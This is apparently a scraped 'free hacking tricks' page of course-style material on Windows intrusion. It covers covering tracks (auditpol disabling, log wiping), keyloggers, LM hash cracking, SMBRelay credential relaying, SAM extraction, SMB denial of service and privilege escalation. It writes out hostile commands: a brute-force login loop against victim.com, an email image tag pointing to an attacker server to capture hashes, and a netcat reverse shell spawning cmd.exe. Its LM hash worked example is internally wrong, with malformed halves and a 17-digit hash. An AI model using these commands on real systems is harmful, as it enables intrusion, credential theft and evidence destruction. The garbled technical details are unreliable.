Learn Ethical Hacking Tools Free Hacking Tricks How To Hack Hacking Passwords & Email Hacking

• Once intruders have successfully gained Administrator access on a system, they will try to cover the detection of their presence.

• When all the information of interest has been stripped from the target, they will install several back doors so that easy access can be obtained in the future.

Erasing evidence of a compromise is requirement for any attacker who would like to remain obscure. This usually starts with erasing the contaminated logins and any possible error messages that may have been generated from the attack process. For example, a buffer overflow attack will usually leave a message in the system logs. Next, the attention is turned to effecting changes so that future logins are not logged. A good way of ensuring that the system administrator continues to believe the output of his system is to manipulate the event logs and tweak the audit system.

Because the first thing a system administrator does to monitor unusual activity is to check the system log files, it is very common for intruders to use a utility to modify the system logs. In some extreme cases, rootkits can disable logging all together and discard all existing logs. This happens if the intruders intend to use the system for a longer time as a launch base for future intrusion activity. Then they will only remove those portions of logs that can reveal their presence.

• First thing intruders will do after gaining Administrator privileges is to disable auditing.

• NT Resource Kit's auditpol.exe tool can disable auditing using command line.

• At the end of their stay, the intruders will just turn on auditing again using auditpol.exe

Windows auditing records certain events to the Event Log (or associated syslog). The log can be set to send alerts (email, pager, etc) to the system administrator. Therefore, the attacker will want to know the auditing status.

auditpol.exe is a part of the NT resource kit and can be used as a simple command line utility to find out the audit status of the target system and also to make changes to it.

The attacker will need to have the utility installed in the WINNT directory. He can then establish a null session to the target machine and run the command:

C:\> auditpol \\ 

This will reveal the current audit status of the system. He can choose to disable the auditing by:

C :\> auditpol \\ /disable 

This will make changes in the various logs that might register his actions. He can choose to hide the registry keys changed later on.

There is no effective technique to lock the auditing to prevent auditpol from disabling it. However, one can make it a scheduled event which will make the system check for the status of the auditing and then turns it on if it is disabled. Most host based IDS products will automatically re-enable auditing if it has been turned off.

There are a number of reasons why auditing is important. These include:

• Successful attacks often preceded by a series of unsuccessful ones.

• Detecting an attack in its early phase can contain damage.

• Recovery often depends on realistic damage assessment.

• Auditing and intrusion detection helps determine causal factors/people for the attack.

• Assessing network compromise is dependant on auditing as well. One of the main goals of auditing is to identify the actions taken by attackers on your network. An attacker may attempt to compromise multiple computers and devices on the network.

• Intruders can easily wipe out the logs in the event viewer

• Event viewer on the attackers host can open, read and clear logs of the remote host.

• This process will clear logs of all records but will leave one record stating that the event log has been cleared by 'Attacker'

In the Security Log, always check on event IDs 529 "Unknown user or bad password," 680 "Account logon," and 517 "Security Log Cleared.

The following syntax is used by the dumpel.exe tool:

dumpel -f file [-s \\server] [-1 log [-m source]] [-e n1 n2 n3...] [-r] [-t] [-d x] Where:

-f file. Specifies the file name for the output file. There is no default for -f, so you must specify the file.

-s server. Specifies the server for which you want to dump the event log. Leading backslashes on the server name are optional.

-1 log. Specifies which log (system, application, security) to dump. If an invalid log name is specified, the application log is dumped.

-m source. Specifies in which source (such as redirector (rdr), serial, and so on) to dump records. Only one source can be supplied. If this switch is not used, all events are dumped. If a source is used that is not registered in the registry, the application log is searched for records of this type.

-e n1 n2 n3. Filters for event ID nn (up to 10 can be specified). If the -r switch is not used, only records of these types are dumped; if -r is used, all records except records of these types are dumped. If this switch is not used, all events from the specified source name are selected. You cannot use this switch without the -m switch.

-r. Specifies whether to filter for specific sources or records, or to filter them out.

-t. Specifies that individual strings are separated by tabs. If -t is not used, strings are separated by spaces.

-d x. Dumps events for the past x days.

ELSave takes the following arguments:

Example:

Save the application log on \\serv1 to \\serv1\d$\application.log:

elsave -s \ \serv1 -F d: \application.log 

Save the system log on the local machine to d: \system.log and then clear the log:

elsave -l system -F d: \system.log -C 

• Wizapper is a tool that an attacker can use to erase event records selectively from the security log in Windows 2000.

• To use the program, the attacker runs winzapper.exe and marks the event records to be deleted, then he presses 'delete events' and 'exit'. Presto the events disappear.

• To sum things up: after an attacker has gained Administrators access to the system, one simply cannot trust the security log!

It is considered that event logs are generally not compromised without shutting the service down by legitimate means or otherwise. WinZapper is a tool that is capable of breaking into the event logging system without shutting it off or crashing the service.

• Evidence Eliminator is an easy to use powerful and flexible data cleansing system for Windows PC.

• Daily use protects you from unwanted data becoming permanently hidden in your PC.

• It cleans recycle bins, Internet cache, system files, temp folders etc.

Evidence Eliminator is a windows based product that is known for countering privacy invasion and giving the user the ability to remove evidence of his activities on a system - such as websites visited, cookies stored, documents read etc.

• There are two ways of hiding files in NT/2000.

  1. Attrib

     • use attrib +h [file/directory]

  2. NTFS Alternate Data Streaming

     • NTFS files system used by Windows NT, 2000 and XP has a feature Alternate Data Streams - allow data to be stored in hidden files that are linked to a normal visible file.

  Streams are not limited in size and there can be more than one stream linked to a normal file.

Every file consists of a set of attributes. However, a file's name is not part of the file. The filename is a directory entry that points to the actual file. This level of indirection is necessary because Windows 2000 and Windows NT both support links. The directory entry can be considered to be analogous to a pointer - the unique filename and directory entry tells the file system which file to access. It is possible to have more than one pointer that points to the same data.

• If all other attempts to sniff out domain privileges fail, then keystroke logger is the solution.

• Keystroke loggers are stealth software that sits between keyboard hardware and the operating system, so that they can record every key stroke.

• There are two types of keystroke loggers:

  1. Software based and

  2. Hardware based.

Keystroke loggers come in both hardware and software forms and are used to capture and compile a record of everything typed using the keyboard and making it available to another person / agency probing the user. This may be conveyed over e-mail or a Web site or even saved on the same system as a hidden file.

Generic keystroke loggers record the application name, time and date the application was opened, and the keystrokes associated with that application. The appeal keystroke loggers have is the ability to capture information before it can be encrypted for transmission over the network. This gives the person probing access to pass phrases and other well-hidden information. Keystroke loggers can be broadly classified as hardware keystroke loggers and software keystroke loggers.

Hardware keystroke loggers are hardware devices that attach physically to the keyboard and records data. These devices generally look like a standard keyboard adapter, so that they remain camouflaged unless specifically looked for. In order to retrieve data from a hardware logger, the person who is doing the probing must regain physical access to that piece of equipment. Hardware loggers work by storing information in the actual device, and generally do not have the ability to broadcast or send such information out over a network. One primary advantage hardware keystroke loggers carry is that they will not be discovered by any of the anti-spyware, anti-virus or desktop security programs.

Software keystroke loggers are more widely used as they can be installed remotely via the network, as part of virus / Trojan software etc. Physical access is not required on part of the person probing to obtain keystroke data (as data is emailed out from the machine periodically). Software loggers often have the ability to obtain much more data as well, as they are not limited by physical memory allocations in the same way as hardware keystroke loggers are. Magic Lantern - developed as part of the FBI's Carnivore project - is a Trojan/key-logger specifically aimed at gathering encryption key information for transmission back to the FBI.

• Spector is a spy ware and it will record everything anyone does on the internet.

• Spector automatically takes hundreds of snapshots every hour, very much like a surveillance camera. With spector, you will be able to see exactly what your surveillance targets have been doing online and offline.

• Spector works by taking a snapshot of whatever is on your computer screen and saves it away in a hidden location on your computer's hard drive.

• eBlaster lets you know EXACTLY what your surveillance targets are doing on the internet even if you are thousands of miles away.

• eBlaster records their emails, chats, instant messages, websites visited and key strokes typed and then automatically sends this recorded information toy our own email address.

• Within seconds of them sending or receiving an email, you will receive your own copy of that email.

In addition to a flexible and friendly keystroke log viewer, IKS is extremely configurable . For manual setup, an attacker needs to copy just one program file to the target computer and add two lines in system.ini file. He can then rename the log file, or even rename the program. Therefore, even an exhaustive hard drive search will find that the program exists

IKS has an internal memory buffer of 100 keystrokes. In order to increase performance of the system, the program will not dump the buffer to the disk until it is full or if the keyboard is idle for about three minutes with keystrokes in the buffer. When the system is shutting down, however, the program will dump the buffer immediately if there are any keystrokes in it.

• The Hardware Key Logger is a tiny hardware device that can be attached in between a keyboard and a computer.

• It keeps a record of all key strokes typed on the keyboard. The recording process is totally transparent to the end user.

The keystrokes can only be retrieved by an administrator with a proper password. The device can be installed even when the target computer is logged out, has a password, is locked or switched off. The device can be unplugged and the keystrokes retrieved on another computer.

Over 500,000 keystrokes can be stored with strong 128-bit encryption in non-volatile flash memory (same as in smart cards) that doesn't need batteries to retain storage. The device works on any desktop PC & all PC operating systems, including Windows 3.1, 95, 98, NT, 2000, Linux, OS/2, DOS, Sun Solaris and BeOS. No software installation is needed at all to record or retrieve keystrokes.

Recorded keystrokes can be played back into any text editor using proprietary 'keystroke ghosting' technique. The device plugs into computers with a small PS/2 keyboard plug or a large DIN plug. Unlike software keystroke recorders, KeyGhost records every keystroke, even those used to modify the BIOS before bootup. The greatest advantage is that it is impossible to detect or disable using software. One must visually scan the back of the computer where the keyboard is plugged in to detect its presence.

Example: Lets say your password is: '123456qwerty'

• When this password is encrypted with LM algorithm, it is first converted to all uppercase: '123456QWERTY'

• The password is padded with null (blank) characters to make it 14 character length: '123456QWERTY_'

• Before encrypting this password, 14 character string is split into half: '123456Q and WERTY_'

• Each string is individually encrypted and the results concatenated.

• '123456Q' = 6BF11E04AFAB197F

  'WERTY_' = F1E9FFDCC75575B15

• The hash is 6BF11E04AFAB197FF1E9FFDCC75575B15

All Windows clients including Windows 2000, Windows Server 2003, and Windows XP are configured by default to send LM and NTLM authentication responses, except Win9x clients, which only send LM. The default setting on servers allows all clients to authenticate with servers and use their resources. However, this default setting allows for LM responses (the weakest form of authentication response) to be sent over the network. This makes it attractive to attackers who can sniff the traffic and crack passwords with relatively less effort.

Microsoft Windows NT stores two types of passwords: A LAN Manager (LM) password and a Windows NT password. We have seen in our discussion in module four how the domain controller gives out an eight byte challenge and the twenty four byte challenge response the client (server or workstation) replies with. These hashes are transmitted without encryption over the network. If the domain controller authenticates the challenge response, it replies with an NT session key and a LAN Manager (LM) session key. These session keys are encrypted between the client and the Domain Controller.

Let us now take a look at the LAN Manager hash. LAN Manager uses a fourteen byte password. If the password is less than fourteen bytes, it is concatenated with zeros. After conversion into upper case, it is split into seven byte halves. From each seven byte half an eight byte odd parity DES key is constructed. Each eight byte DES key is encrypted with a "magic number". The results of the magic number encryption are concatenated into a sixteen byte one way hash value. This value is the LAN Manager one-way hash of the password.

It is easy for password crackers to detect if there is an eighth character when the LM password is used. The challenge response can then be brute-forced for the LM-hash. The number of possible combinations in the LM password is relatively low compared to the Windows NT password.

While encryption forms such as Kerberos are considered as effective countermeasure, the Windows 9x and Windows NT operating systems cannot use the Kerberos version 5 protocol for authentication. Therefore in Windows Server 2003 also, these systems authenticate by default with both the LM and NTLM protocols for network authentication. What is possible though is for Windows 9x and Windows NT to use a more secure authentication protocol such as NTLMv2. For the logon process, NTLMv2 uses a secure channel to protect the authentication process. Therefore these systems have to set LAN Manager Authentication Level to "Send NTLMv2 responses only".

---Regards,

• It is a command line tool designed to crack both Unix and NT passwords. John is extremely fast and free

• The resulting passwords are case insensitive and may not represent the real mixed-case password.

John the Ripper is a fast password cracker, currently available for many flavors of UNIX (11 are officially supported), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak UNIX passwords. John the Ripper is a part of Owl, Debian GNU/Linux, SuSE, very recent versions of Mandrake Linux, and EnGarde Linux. It is in the ports/packages collections of FreeBSD, NetBSD, and OpenBSD.

John the Ripper is designed to be both powerful and fast. It combines several cracking modes in one program, and is fully configurable for specific needs. As John is available for different platforms, the attacker can use the same cracker everywhere and even continue a cracking session started on a different platform. It supports several cryptographic password hash types most commonly found on various UNIX flavors. Supported out of the box are Kerberos AFS and Windows NT/2000/XP LM hashes, plus several more with contributed patches.

Out of the box, John supports (and auto detects) the following ciphertext formats: standard and double-length DES-based, BSDI's extended DES-based, FreeBSD's MD5-based, and OpenBSD's Blowfish-based. With just one additional command (required to extract the passwords), John can crack AFS passwords and WinNT LM hashes. John has highly optimized modules for different ciphertext formats and architectures. Some of the algorithms used - such as bitslice DES - require a more powerful interface. Additionally, there are assembly routines for several processors and architectures (special Intel Pentium version, x86 with MMX, generic x86, Alpha EV4, SPARC V8).

However, the resulting passwords are case insensitive and may not represent the real mixed-case password. Indeed, this is a small hindrance to a determined patient attacker.

SMBGrind increases the speed of LOphtcrack sessions on sniffer dumps by removing duplication and providing a facility to target specific users without having to edit the dump files manually.

One way of increasing the speed of LOphtCrack sessions on sniffer dumps is to remove duplication and provide a facility to target specific users without having to edit the dump files manually. Therefore password cracking becomes a time-consuming laborious process unless it is targeted towards particular passwords.

If an attacker can force a NetBIOS connection from its target it can retrieve the user authentication information of the currently logged in user. On its part SMB protocol uses a challenge-response method of authentication to prevent replay attacks and complicate cracking. The challenge is eight bytes of randomly generated data which the client encrypts using the password as an encryption key. If this can be obtained, the session can be hijacked as well. But this is not always easy.

SMBGrind is a tool that seeks to solve this problem and make password cracking by LOphtCrack faster. It removes duplicates and saves the file to disk so that the attacker can e-mail the filtered file directly from within SMB Grinder via the File-Send menu option.

SMBDie tool crashes computers running Windows 2000/XP/NT by sending specially crafted SMB request

SMBDie is another tool that takes advantage of the implementation of a protocol by a vendor. The vulnerability results because of a flaw in the way Microsoft's implementation of SMB receives a packet requesting the SMB service. Two SMB exploit programs - SMBDie and smbnuke exploit the vulnerability the same way.

An attacker can launch a denial of service by establishing a valid SMB session to a Windows NT/2000/XP system, and then sending a specially crafted transaction packet to request the NetServerEnum2, NetServerEnum3 or NetShareEnum functions. In the SMB transaction packet, if either or both of "Max Param Count" and "Max Data Count" values are equal to zero, then the server miscalculates the length of the first buffer. This causes the next chunk in the heap to be overwritten. Once the first buffer is released then the heap will be in an inconsistent state and will cause a blue screen of death. The attacker can use both a user account and anonymous access to accomplish this.

Any machine on the network including systems that are connected via VPN can launch this attack. All that an attacker needs is the IP address and NetBIOS name of the target system. The attack registers an entry in the system log when it is successful but does not indicate the source of the attack. Countermeasures include blocking access to SMB ports from untrusted networks. By blocking TCP ports 445 and 139 at the network perimeter, administrators can prevent the attack from untrusted parties. Additionally, the LAN man server service can be stopped which prevents the attack, but again may not be suitable on a file and print sharing server.

• NBTDeputy register a NetBIOS computer name on the networkand is ready to respond to NetBT name-query requests.

• NBT deputy helps to resolve IP address from NetBIOS computer name. It's similar to Proxy ARP.

• This tool works well with SMBRelay.

• For example, SMBRelay runs on a computer as ANONYMOUS-ONE and the IP address is 192.168.1.10 and NBT Deputy is also ran and 192.168.1.10 is specified. SMBRelay may connect to any XP or .NET server when the logon users access "My Network Places"

There are certain pre-requisites for NBTdeputy to be effective. NetBIOS over TCP/IP must be disabled as NBTdeputy uses port 137 and 138. The user must specify a unique computer name on the LAN because NBTdeputy does not check for existing computer names. The user must also specify an existing Workgroup on LAN as NBTdeputy does not become the Master Browser. NBTdeputy must exist on the same LAN as the targeted XP and .Net Server machines.

• Sending a 'NetBIOS Name Release' message to the NetBIOS Name Service (NBNS, UDP 137) on a target NT/2000 machine forces it to place its name in conflict so that the system will no longer will be able to use it.

• This will block the client from participating in the NetBIOS network.

• Tool: nbname

  • NBName can disable entire LANs and prevent machines from rejoining them.

  • Nodes on a NetBIOS network infected by the tool will think that their names already are being used by other machines.

NetBIOS is a set of defined software interfaces for vendor-independent PC networking and is primarily used on Microsoft Windows computers. The NetBIOS Name Service (NBNS) provides a means for hostname and address mapping on a NetBIOS-aware network. In Microsoft's implementation of the NBNS Name Server (Microsoft WINS Server) they mapped group names to the single IP address 255.255.255.255 (the limited broadcast address). In order to support real group names, Microsoft modified WINS to provide support for special groups. These groups appear differently in WINS. However, since an authentication mechanism has not been defined for NetBIOS running over TCP/IP protocol, all systems running NetBIOS services are vulnerable to spoofing attacks.

For instance, an attacker can send spoofed "Name Release" or "Name Conflict" messages to a target machine and force the target machine to remove its real name from its name table (as seen with nbtstat) and not respond to other NetBIOS requests. This results in a denial of service as the legitimate machine is not able to communicate with other NetBIOS hosts.

Using the /DENY * command line option it will respond negatively to all NetBIOS name registration packets it receives.

Using the /CONFLICT command line option it will send a name release request for each name that is not already in conflict to machines it receives an adapter status response from.

The /FINDALL command line option causes a wildcard name query request to be broadcast at startup and each machine that responds to the name query is sent an adapter status request.

The /ASTAT command line option causes an adapter status request to be sent to the specified IP address, which doesn't have to be on the local network.

Using /FINDALL /CONFLICT /DENY * will disable entire local NetBIOS network and prevent machines from rejoining it. Nodes on a NetBIOS network infected by the tool will think that their names already are being used.

• The problem is to convince a victim's client to authenticate to the MITM server

• You can send a malicious e-mail message to the victim client with an embedded hyperlink to the SMBRelay server's IP address.

• Another solution is ARP poisoning attack against the entire segment causing all of the systems on the segment to authenticate through the fraudulent MITM server Countermeasures

• Configure Windows 2000 to use SMB signing.

• Client and server communication will cause it to cryptographically sign each block of SMB communications.

• These settings are found under Security Policies /Security Options

There are inherent weaknesses in executing a SMBRelay attack. The hindrances to this attack are pointers towards countermeasures to be adopted. Firstly SMBRelay must be able to bind to port 139 to receive the incoming NetBIOS connections. This requires administrative privileges as this is a port number less than 1024.

Another solution is ARP poisoning attack against the entire segment causing all of the systems on the segment to authenticate through the fraudulent MITM server. ARP traffic can be easily spoofed to reroute traffic originating from the system to the attacker's system, even in a switched environment. Rerouted traffic can be viewed with a network packet analyzer and then forwarded to the real destination in a variant of the MITM attack.

The only real prevention against SMBRelay is to dismantle all SMB communications and to use Windows 2000 Kerberos authentication only in a native, single forest environment network (with no legacy clients) and with all applications supporting Kerberos.

While considering countermeasures, disabling NetBIOS alone is not sufficient to prevent SMB communication. This is because in the absence of standard NetBIOS ports, SMB will use Transmission Control Protocol (TCP) port 445, which is referred to as SMB Direct Host or the Common Internet File System (CIFS) port. As a result, explicit steps must be taken to disable both NetBIOS and SMB separately.

NetBIOS uses the following ports: UDP/137 (NetBIOS name service), UDP/138 (NetBIOS datagram service) and TCP/139 (NetBIOS session service). SMB uses the following ports: TCP/139, TCP/445. On servers accessible from the Internet, SMB must be disabled by removing File and Printer Sharing for Microsoft Networks and Client for Microsoft Networks using the Transmission Control Protocol/Internet Protocol (TCP/IP) properties dialog box in the Local Area Connection properties dialog box.

• The attacker in this setting sets up a fraudulent server at 192.168.234.251, a relay address of 192.168.234.252 using /R, an d a target server address of 192.168.234.34 with /T.

  c:\> smbrelay /IL 2 /IR /R 192.168.234.252 /T 192.168.234.34

• When a victim client connects to the fraudulent server thinking it is talking to the target, MITM server intercepts the call, hashe s the password and passes the connection to the target server.

SMBRelay can also be used for session hijacking. The attacker can pose as the "man in the middle" by virtually interposing himself between the client and host. SMBRelay is the first widely distributed hack tool that automates the man-in-the-middle (MITM) attack. SMBRelay automates the process by functioning first as a data relay between the client and host, sending on all but the authentication data.

The attacker can send a client of the targeted host an HTML e-mail message with a link to a NetBIOS share on the web server. As the target's computer attempts to establish a NetBIOS connection, the attacker steps in, intercepts the client's credentials, and passes them off as his own.

Then the attacker disconnects the client and binds the host to a new IP relay address that the attacker can log on to, all the while maintaining the original client's host privileges. At the same time NTLM password hashes exchanged by the client and host are collected and saved to a text file.

For example, set up a MITM server at 192.168.200.114 using the /L+ switch, a relay address of 192.168.200.252 using the /R and a target server address of 192.168.200.168 with the /T switch:

c:\>smbrelay /IL /IR 2 192.168.200.252 /T 192.168.200.168

A victim client, 192.168.200.120, is then coaxed into connecting to the fraudulent MITM server by deception.

This brings us to SMBRelay2, which works at the NetBIOS level, and should work across any protocol NetBIOS is bound to (such as NetBEUI or TCP/IP). The difference is that instead of using IP addresses, SMBRelay2 uses NetBIOS names. Moreover, it supports man in the middle attack to a third host. However, the limitation of this utility is that currently it supports listening on only one name, so the target must attempt to connect to that name for SMBRelay2 to operate (the local name).

• SMBRelay is essentially a SMB server that can capture usernames and password hashes from incoming SMB traffic.

• It can also perform man-in-the-middle (MITM) attacks.

• You must disable NetBIOS over TCP/IP and block ports 139 and 445.

• Start the SMBRelay server and listen for SMB packets:

  c:\>smbrelay /e c:\>smbrelay /IL 2 /IR 2 

• An attacker can access the client machine by simply connecting to it via relay address using: c: \> net use * \\\c$

SMBRelay by Sir Dystic of the Cult of Dead Cow is essentially a SMB server that receives a connection on port 139, connects back to the connecting computer's port 139 or to another target server, and relays the packets between the client and server of the connecting Windows machine, as well as making modifications to these packets when necessary.

SMBRelay functions first as a data relay between the client and host, sending on all but the authentication data. Then the attacker disconnects the client and binds the host to a new IP relay address that the attacker can log on to, all the while maintaining the original client's host privileges. At the same time NTLM password hashes exchanged by the client and host are collected and saved to a text file.

The usage is smbrelay [options]

Options:

• /D num - Set debug level, current valid levels: 0 (none), 1, 2 Defaults to 0.

• /E - Enumerates interfaces and their indexes.

• /F[-] - Fake server only, capture password hashes and do not relay Use - to disable acting as a fake server if relay fails.

• /IL num - Set the interface index to use when adding local IP addresses.

• /IR num - Set the interface index to use when adding relay IP addresses Defaults to 1.

• /L[+] IP - Set the local IP to listen on for incoming NetBIOS connections. Use + to first add the IP address to the NIC Defaults to primary host IP.

• /R[-] IP - Set the starting relay IP address to use. Use [-] to not add each relay IP address to the NIC Defaults to 192.1.1.1 first.

• /S name - Set the source machine name.

The attacker can choose to disable TCP port 445 on the rogue server using an IPSec filter so that traffic will always flow through TCP port 139. The servers can then capture both LM and NTLM passwords, and write them to its working directory as hashes.txt which can be later imported into LOphtCrack. Furthermore, the attacker's system now can access the client machine by simply connecting to it via the relay address: c: \>net use * \\192.x.x.x\c$

On the client side (W2K), "net use" command will fail to turn up any sessions as the program throws a system error 64 and indicates that no drives are mounted. However, running "net session" will reveal that it is connected to the spoofed machine name, CDC4EVER, which SMBRelay sets by default unless changed using the "/S name" parameter.

• Eavesdropping on LM responses becomes much easier if the attacker can trick the victim to attempt Windows authentication of the attacker's choice.

• Basic trick is to send an email message to the victim with an embedded hyperlink to a fraudulent SMB server.

• When the hyperlink is clicked, the user unwittingly sends his credentials over the network.

SMB stands for Server Message Block, and is a protocol for sharing files, printers, serial ports, and communications abstractions such as named pipes and mail slots between computers. SMB is a client server, request-response protocol. Normally after clients have connected to servers using TCP/IP, NetBEUI or IPX/SPX, they can send commands (SMBs) to the server that allow them to access shares, open files, read and write files, and other file operations. The vulnerability is that in the case of SMB, these things are done over the network. SMB has been seen used over TCP/IP, NetBEUI and IPX/SPX, NetBIOS etc.

The SMB model defines two levels of security: Primarily protection is applied at the share level on a server. Each share can have a password, and a client only needs that password to access all files under that share. This was the first security model that SMB had. The second security level is at the user level. Protection is applied to individual files in each share and is based on user access rights. Every client desiring to access resources must log in to the server and authenticate itself. Once authenticated, the client is given a UID which is to be presented on all subsequent accesses to the server. This model has been available since LAN Manager 1.0.

While SMB password guessing is still the most effective method for gaining access to Windows systems, an unsuccessful attacker might attempt to eavesdrop on SMB logon exchanges / authentication using sniffing techniques. This may be directly off the network using tools such as Lophtcrack SMBCapture. SMBCapture is capable of sniffing Windows NT/2000 challenge-response authentication traffic off the network and feeding it into the Lophtcrack cracking engine.

As an example, the following code submitted in the email and embedded in html brackets will show nothing in the email but, when the null gif is loaded by the victim's Internet Explorer, the victim will automatically initiate an SMB session with attacker_server.

img src=file://attacker_server/null.gif height=1 width=1. SMBCapture will be listening on the attacker_server or its local segment and the LM challenge-response will be extracted. It is also possible to use ARP redirection/cache poisoning to redirect client traffic to a designated system.

Countermeasures include:

• Using Windows 2000 Kerberos authentication only in a native, single forest environment network (no legacy clients) with all applications supporting Kerberos;

• Ensuring physical security best practices; Ensuring that network access points are inaccessible to passersby;

• Setting LAN Manager Authentication Level to "Send NTLM responses only". The NTLM response is not susceptible to SMBCapture attack; SMBCapture will maintain it is capturing but, when sent to Lophtcrack, the hashes will not crack within a reasonable time frame.

• SAM file in Windows NT/2000 contains the usernames and encrypted passwords. The SAM file is located at %systemroot%\system32\config directory [open this link using RUN]

• The file is locked when the OS is running.

  • Booting to an alternate OS

    • NTFSDOS (www.sysInternals.com) will mount any NTFS partition as a logical drive.

  • Backup SAM from the Repair directory

    • Whenever rdisk /s is run, a compressed copy of the SAM called SAM._ is created in %systemroot%\repair. Expand this file using c:\>expand sam._sam

  • Extract the hashes from the SAM

    • Use LOphtcrack to hash the passwords.

Not all is lost if the system is in use and the SAM file is locked. If a system administrator has casually forgotten to rename the administrator account or change the initial password, the attacker might be in luck because during the installation of NT/2000 a copy of the password database is put in \\WINNT\REPAIR.

What happens if the system administrator has updated their repair disk? The attacker can then look for a copy of the repair disks and extract the password database from the SAM._ file in the ERD directory. He can then use a couple of different utilities for dumping the password hashes out, like pwdump or even run Lophtcrack (which has pwdump code built in) to extract the passwords. SAMDUMP.EXE can be used to extract the user information out of it.

• Passwords that contain only letters: As rightly inferred, these contain just alphabets and are the easiest to crack. Example: "secret"

• Passwords that contain only numbers: These passwords consist purely of numerals. Example: "12354"

• Passwords that contain only special characters: These passwords consist of only special characters. They are easy to crack in accordance with their decreasing length. Example: "*%$%@"

• Passwords that contain letters and numbers: These passwords were the first step towards secure passwords. They are relatively harder to crack than passwords with just letters or numerals. Examples: "a3rf5"

• Passwords that contain only letters and special characters and passwords that contain only special characters and numbers are quite similar to the preceding one. Examples: "df%g$i", "39*&4"

• Passwords that contain letters, special characters and numbers are considered to be the most secure as the combination can be difficult to crack. Given an appropriate length, they can be considered to be safe and if encrypted well, safe on the network as well. Example: "a#d5y8%"

• Find a valid user

• Find encryption algorithm used

• Obtain encrypted passwords

• Create list of possible passwords

• Encrypt each word

• See if there is a match for each user ID

• Repeat steps 1 through 6

However, the vulnerability does not arise from the hashing process but from the storage. Most systems do not "decrypt" the stored password during authentication, but store the one-way hash. During the login process, the password entered is run through the algorithm generating a one-way hash and compared to the hash stored on the system. If they are the same, it is assumed the proper password was supplied. Therefore all that an attacker has to do in order to crack a password is to get a copy of the one-way hash stored on the server, and then use the algorithm to generate his own hash until he gets a match. Most systems - Microsoft, UNIX, and Netware have publicly announced their hashing algorithm.

Attackers can use a combination of attack methods to reduce the time involved in cracking a password. This is where automated password crackers come into action. There are freeware password crackers available on the Internet for NT, Netware, and UNIX. Not to be forgotten that there are password lists that can be fed to these crackers to carry out a dictionary attack.

• Find a valid user

• Create a list of possible passwords

• Rank the passwords from high probability to low

• Key in each password

• If the system allows you in - Success

• Else try till success

A text file is created to serve as a dictionary from which the main FOR loop will draw usernames and passwords as it iterates through each line:

[file: credentials.txt] administrator "" 

administrator password 

administrator administrator 

[Etc.] 

From a directory that can access the text file the following command is typed:

c:\>FOR /F "tokens=1,2*" %i in (credentials.txt)^

More? do net use \\victim.com\IPC$ %j /u:victim.com\%i^ 

More? 2 >> nul^ 

More? && echo %time% %date% >> outfile.txt^ 

More? && echo \\victim.com acct: %i pass: %j >> outfile.txt 

c:\>type outfile.txt 

If there has been a successfully guessed username and  password from credentials.txt, outfile.txt will exist and contain the correct  user name and password. The attacker's system will also have an open session  with the victim server.

• If an attacker gains access to the network using non-admin user account, the next step is to gain higher privilege to that of an administrator.

• This is called privilege escalation

For instance the named pipes prediction flaw in Windows 2000 allows interactively logged on users to impersonate the SYSTEM account and execute arbitrary programs with those privileges. By reading the Registry key HKLM\SYSTEM\CurrentControlSet\Control\ServiceCurrent, an attacker can anticipate the next Named Pipe and create the pipe before the SCM creates a pipe with the same name. When a new service is started, it connects to this malicious pipe. By instructing the SCM to start an arbitrary service that runs as a highly privilege, (such as Clip Book which runs as SYSTEM) the SCM connects the service to the malicious pipe. Run c:\>PipeUpAdmin. The program then adds the user to the local Administrator's group. The attacker can conclude his privilege escalation by logging out and then logging in.

On an NT machine GetAdmin attaches to the WinLogon process, which runs in the system's security context, and makes standard API calls that will add the specified user to the administrators group. This is a classic instance of privilege escalation. Though Microsoft issued a hotfix, any user who has been granted the rights to "Debug Programs" will always be able to run the program successfully. This is possible because the "Debug Programs" right allows a user to attach to any process. The "Debug Programs" right is initially granted to Administrators and ideally should be only granted to fully trusted users.

Similarly, if Getadmin.exe is run by a user who is already a member of the administrators local group, it will continue to work (even after applying the hotfix). This is possible because members of the administrators group always have the rights to make the calls GetAdmin needs in order to succeed. Getadmin.exe cannot be used remotely and must be executed locally. It works for accounts on a workstation or member server and for domain accounts on a primary domain controller (PDC). However, the tool does not function on a backup domain controller (BDC) because the account database on a BDC is read only. Therefore the only way to use GetAdmin to modify a domain account database is to log on a primary domain controller and run the utility locally on the PDC.

The hk.exe utility exposes a Local Procedure Call flaw in NT.

• A non-admin user can be escalated to administrators group using hk.exe

  C:\>net localgroup administrators peter /add Access Denied ------------------------------------------------  c:\>hk net localgroup administrators peter /add lsass pid & tid are: 47 -48 NtImpersonateClientOfPort succeeded 

nc -1-p 23 nc -d -e cmd.exe 192.168.xx.xx 23 (Done on the active netcat running on the webserver) hk2 nc -d -e cmd.exe 192.168.xx.xx 23 lsass pid & tid are: 50 - 53 

The NtImpersonateClientOfPort succeeds because of the nature by which port communication takes place between the client system and the server. During a conversation, although the server receives a new handle from NtAcceptConnectPort for each client that connects, it usually does not use that handle when communicating with its clients. Instead, it uses the original handle it got from the NtCreatePort call.